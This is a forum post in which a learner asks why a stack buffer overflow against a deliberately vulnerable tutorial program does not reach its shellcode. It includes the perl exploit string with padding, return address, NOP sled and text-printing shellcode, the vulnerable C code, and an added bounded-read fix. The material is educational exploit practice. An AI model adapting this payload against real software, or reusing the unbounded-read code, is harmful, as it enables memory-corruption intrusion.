Posted: Thu Mar 25, 2010 10:05 pm Post subject: Buffer overflow question
I've been trying to write my first buffer overflow and have come across some problems. This is being done on a public piece of code from a buffer overflow paper and is completely non-malicious.
I discovered where, past my buffer, the saved EIP lies and overwrote it with an address pointing to a series of NOPs on the stack, followed by a piece of shellcode I found on the internet, written to print the string "now I pown your computer".
What baffles me is why the program (under gdb) does not seem to be jumping to the shellcode or executing it. Following is a little output from gdb showing my situation.
The string I used to overflow the buffer and overwrite the EIP is:
perl -e 'print "A"x268, "\xf8\xf2\xff\xbf", "\x90"x30, "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd", "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20", "\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74", "\x65\x72"' > input
#include <stdio.h>
#include <string.h>

/*
 * INPUT_BUFFER and the getline() called below are the paper's own, defined in
 * parts of its source that the post does not reproduce (that getline() is the
 * paper's unbounded line reader, not the POSIX one from <stdio.h>).
 */

/*
 * convert newlines to nulls in place
 */
void purgenewlines(char *s)
{
    int l;

    l = strlen(s);
    while (l--)
        if (s[l] == '\n')
            s[l] = '\0';
}

int main()
{
    char scapegoat[INPUT_BUFFER];

    getline(scapegoat);   /* the unbounded read: anything longer than the buffer lands past it */
    /* this check ensures there's no buffer overflow */
    /* (it runs only after the write above has already happened) */
    if (strlen(scapegoat) < INPUT_BUFFER) {
        purgenewlines(scapegoat);
        printf("It's all %s's fault.\n", scapegoat);
    }
    return 0;
}
The shellcode starts at 0xbffff30e and ends at 0xbffff345.
The EIP should return to the NOPs at 0xbffff2f8 and continue until it executes the shellcode, correct? If so, why am I not seeing output?
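The program above checks strlen() only after the unbounded read has already written past the buffer, so the bound has to be enforced at write time. As an added example (not code from the post or from the paper it quotes), here is a bounded replacement for the paper's getline(), with an assumed INPUT_BUFFER of 256 and a constructed harness that places a guard byte right after the buffer:

```c
#include <stdio.h>
#include <string.h>

#define INPUT_BUFFER 256 /* assumed size; the post never states the real value */

/*
 * Bounded replacement for the paper's getline(): stores at most cap-1 bytes
 * in buf, always NUL-terminates, and discards the rest of an over-long line
 * so the next call starts on a fresh line. The newline itself is never
 * stored, so the purgenewlines() pass becomes unnecessary. Returns the
 * number of bytes stored, or -1 on EOF with nothing read.
 */
static int getline_bounded(char *buf, size_t cap, FILE *in)
{
    size_t n = 0;
    int c = EOF;
    if (cap == 0)
        return -1;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n + 1 < cap)          /* keep room for the terminator;  */
            buf[n++] = (char)c;   /* excess bytes are dropped and   */
    }                             /* never reach the stack          */
    buf[n] = '\0';
    return (n == 0 && c == EOF) ? -1 : (int)n;
}

/*
 * Demonstration: a scapegoat buffer of the original size followed by a guard
 * byte is fed a line of line_len 'A's. Returns the byte count stored, or -2
 * if the guard was clobbered, i.e. if anything was written past the buffer.
 */
int run_line(size_t line_len)
{
    struct { char scapegoat[INPUT_BUFFER]; char guard; } frame;
    FILE *in = tmpfile();   /* constructed stand-in for stdin */
    size_t i;
    int stored;
    if (in == NULL)
        return -2;
    for (i = 0; i < line_len; i++)
        fputc('A', in);
    fputc('\n', in);
    rewind(in);
    frame.guard = 0x5A;
    stored = getline_bounded(frame.scapegoat, sizeof frame.scapegoat, in);
    fclose(in);
    return frame.guard == 0x5A ? stored : -2;
}
```

A 300-byte line, longer than the 268-byte padding the post uses before the saved EIP, is truncated to 255 bytes and the guard byte survives.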